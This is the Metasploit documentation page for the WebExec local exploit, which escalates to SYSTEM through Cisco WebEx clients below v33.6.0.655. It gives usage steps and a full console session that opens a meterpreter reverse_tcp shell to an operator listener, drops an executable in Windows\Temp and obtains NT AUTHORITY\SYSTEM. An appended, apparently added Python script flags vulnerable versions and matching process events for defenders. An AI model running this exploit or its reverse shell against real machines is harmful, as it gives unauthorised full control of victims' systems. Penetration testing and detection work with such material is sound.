metasploit-framework/documentation/modules/exploit/windows/local/webexec.md


Description

This module obtains an elevated session with SYSTEM privileges by exploiting a remote code execution vulnerability in Cisco's WebEx client software, in versions below v33.6.0.655.

Vulnerable Application

Cisco WebEx v33.3.8.7 and below

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get a session
  4. Do: use exploit/windows/local/webexec
  5. Do: set SESSION <session>
  6. Do: run
  7. You should get an elevated session.

Scenarios

Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86


msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500

meterpreter > getuid
Server username: WIN-MGMN7ND70I1\a_user
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/webexec 
msf5 exploit(windows/local/webexec) > set session 1
session => 1
msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
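
A defender-side triage check built from the details above (an added example, not part of the module or its documentation). It flags hosts whose WebEx version is below the v33.6.0.655 threshold given in the Description, and process-creation events where an .exe directly under %SystemRoot%\Temp runs as NT AUTHORITY\SYSTEM, as in the session output. The inventory, event field names and host names are constructed, and %SystemRoot% is assumed to be <drive>:\Windows.

```python
import re
from ntpath import normcase

# Threshold from the Description above: versions below v33.6.0.655 are affected.
FIXED_VERSION = (33, 6, 0, 655)
# An .exe written directly under %SystemRoot%\Temp, as in the module output.
# Assumption: %SystemRoot% resolves to <drive>:\Windows on the monitored hosts.
TEMP_EXE = re.compile(r"^[a-z]:\\windows\\temp\\[^\\]+\.exe$")


def parse_version(text):
    """Turn 'v33.3.8.7' or '33.6.0.655' into a tuple of ints, so that
    33.10.x compares above 33.6.x (a plain string comparison gets this wrong)."""
    parts = [int(p) for p in text.strip().lstrip("vV").split(".")]
    return tuple(parts + [0] * (4 - len(parts)))


def is_vulnerable(version_text):
    return parse_version(version_text) < FIXED_VERSION


def suspicious_events(events):
    """Process-creation events matching the pattern in the run above:
    an .exe directly in %SystemRoot%\\Temp running as NT AUTHORITY\\SYSTEM."""
    return [ev for ev in events
            if TEMP_EXE.match(normcase(ev["image"]))
            and ev["user"].upper() == r"NT AUTHORITY\SYSTEM"]


def triage(inventory, events):
    """Map host -> (below fixed version?, matching events on that host)."""
    hits = suspicious_events(events)
    return {host: (is_vulnerable(ver), [e for e in hits if e["host"] == host])
            for host, ver in inventory.items()}


# Constructed sample data; only the version strings and the dropped file name
# are taken from the page.
INVENTORY = {"WS-01": "33.3.8.7", "WS-02": "v33.6.0.655", "WS-03": "33.10.0.1"}
EVENTS = [
    {"host": "WS-01", "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\Temp\Ak4U78kG.exe"},
    {"host": "WS-01", "user": r"WS-01\a_user", "image": r"C:\Windows\Temp\setup.exe"},
    {"host": "WS-02", "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for host, (vuln, found) in triage(INVENTORY, EVENTS).items():
        print(host, "below fixed version" if vuln else "at or above fixed version",
              [e["image"] for e in found])
```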